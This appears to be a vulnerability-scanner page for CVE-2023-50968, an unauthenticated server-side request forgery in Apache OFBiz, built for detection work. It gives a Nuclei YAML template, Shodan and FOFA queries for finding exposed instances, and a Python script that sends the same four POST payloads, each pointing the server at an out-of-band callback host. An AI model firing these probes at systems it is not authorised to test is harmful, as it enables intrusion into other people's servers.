Apache OFBiz < 18.12.11 - Server Side Request Forgery
ID: CVE-2023-50968
Severity: high
Author: your3cho
Tags: cve,cve2023,apache,ofbiz,ssrf
Description
Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz: an unauthenticated user can call a URI that reads properties from an attacker-chosen resource. The same URI can be used to perform a server-side request forgery (SSRF) attack, also without authentication. Users are recommended to upgrade to version 18.12.11, which fixes this issue.

The template below exercises the getJSONuiLabel and getJSONuiLabelArray requests under /partymgr/control/, passing a JSON map in the requiredLabel or requiredLabels parameter whose key is a URL pointing at an interactsh callback host. An HTTP callback from the target to that host is the evidence of the SSRF.
YAML Source

```yaml
id: CVE-2023-50968

info:
  name: Apache OFBiz < 18.12.11 - Server Side Request Forgery
  author: your3cho
  severity: high
  description: |
    Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.
  reference:
    - https://lists.apache.org/thread/x5now4bk3llwf3k58kl96qvtjyxwp43q
    - http://www.openwall.com/lists/oss-security/2023/12/26/2
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50968
    - https://issues.apache.org/jira/browse/OFBIZ-12875
    - https://ofbiz.apache.org/download.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-50968
    cwe-id: CWE-918,CWE-200
    epss-score: 0.23447
    epss-percentile: 0.96556
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apache
    product: ofbiz
    shodan-query:
      - html:"OFBiz"
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2023,apache,ofbiz,ssrf

variables:
  str: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /partymgr/control/{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{parameter}}={"http://{{interactsh-url}}/api":"{{str}}"}

    payloads:
      path:
        - getJSONuiLabel
        - getJSONuiLabelArray
      parameter:
        - requiredLabel
        - requiredLabels
    attack: clusterbomb
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - 'OFBiz.Visitor='
# digest: 4a0a00473045022100fca23d74433993d6639307ac85e0780e49612c2f6371ac0842a525c0e721ab39022053564998de3478ac54e3ec0155a2026b154acb5a0c30a143fc976d8b30adbb29:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This Nuclei template detects the unauthenticated SSRF by making the target fetch a URL under an interactsh callback host. It sends at most four requests (the clusterbomb product of the two request paths and the two parameter names) and stops at the first match. A match requires both conditions: interactsh records an HTTP interaction from the target, and the response carries the OFBiz.Visitor cookie, which confirms that the responding application is OFBiz. The target therefore needs outbound HTTP egress to the interactsh server; on an egress-filtered host the template reports nothing even if the instance is vulnerable. To point the scan at a self-hosted interactsh server, pass it with the -iserver flag.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-50968.yaml"

Note that the template confirms only the outbound request; it does not exercise the arbitrary file properties read described in the advisory.
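The following Python script is an added example, not part of the Nuclei template or of Apache OFBiz. It reproduces the template's request generation (the clusterbomb product of paths and parameters, the random marker, and the JSON body whose key is the callback URL) and its AND-ed matcher logic, so the probe can be read, unit-tested offline and, if wanted, sent with the standard library. The target base URL and the callback host used in the test are constructed placeholders, and the interactsh result is passed in as a list of observed protocols because polling interactsh is outside this script.

```python
"""Reimplementation of the CVE-2023-50968 Nuclei template's probe logic.

Added example; not code from the template author or the OFBiz project.
"""
import itertools
import json
import secrets
import string
import urllib.error
import urllib.request
from typing import Dict, List, Tuple

# Values copied from the template above.
PATHS = ["getJSONuiLabel", "getJSONuiLabelArray"]
PARAMETERS = ["requiredLabel", "requiredLabels"]
VISITOR_COOKIE = "OFBiz.Visitor="


def rand_base(n: int = 6) -> str:
    """Equivalent of the template's {{rand_base(6)}}: n random alphanumerics."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def build_body(parameter: str, callback_host: str, marker: str) -> str:
    """Form body exactly as the template sends it: the callback URL is the
    JSON map's key (the resource OFBiz will try to fetch), the marker its value."""
    payload = json.dumps({f"http://{callback_host}/api": marker},
                         separators=(",", ":"))
    return f"{parameter}={payload}"


def build_requests(base_url: str, callback_host: str, marker: str) -> List[Dict[str, str]]:
    """attack: clusterbomb -> cartesian product of paths x parameters (4 requests)."""
    reqs = []
    for path, parameter in itertools.product(PATHS, PARAMETERS):
        reqs.append({
            "method": "POST",
            "url": f"{base_url.rstrip('/')}/partymgr/control/{path}",
            "headers": {"Content-Type": "application/x-www-form-urlencoded"},
            "body": build_body(parameter, callback_host, marker),
        })
    return reqs


def is_match(response_headers: List[Tuple[str, str]],
             interactsh_protocols: List[str]) -> bool:
    """matchers-condition: and
    1) interactsh saw an "http" interaction from the target (the SSRF evidence);
    2) some response header contains OFBiz.Visitor= (the target is OFBiz).
    Header names are compared case-insensitively; values are searched verbatim."""
    got_http = any("http" in p.lower() for p in interactsh_protocols)
    header_blob = "\n".join(f"{k}: {v}" for k, v in response_headers)
    return got_http and VISITOR_COOKIE in header_blob


def send_probe(req: Dict[str, str], timeout: float = 10.0) -> List[Tuple[str, str]]:
    """Send one generated request and return its response headers as (name, value)
    pairs, keeping duplicate Set-Cookie headers. Network-facing; not used offline."""
    request = urllib.request.Request(req["url"], data=req["body"].encode(),
                                     headers=req["headers"], method=req["method"])
    try:
        with urllib.request.urlopen(request, timeout=timeout) as resp:
            return list(resp.getheaders())
    except urllib.error.HTTPError as exc:
        # A 4xx/5xx still carries headers, and the cookie matcher only needs those.
        return list(exc.headers.items())


if __name__ == "__main__":
    # Placeholder target and callback host (constructed, not real).
    for r in build_requests("http://target.example", "xxxx.oast.example", rand_base()):
        print(r["method"], r["url"])
        print("   ", r["body"])
```

The helper mirrors stop-at-first-match only in spirit: a real run would send the four requests in order and stop as soon as is_match() returns True after interactsh has been polled. Because the two matchers are AND-ed, a callback from a non-OFBiz host (for example a proxy that fetches URLs on its own) is not reported, and an OFBiz host with no egress is not reported either.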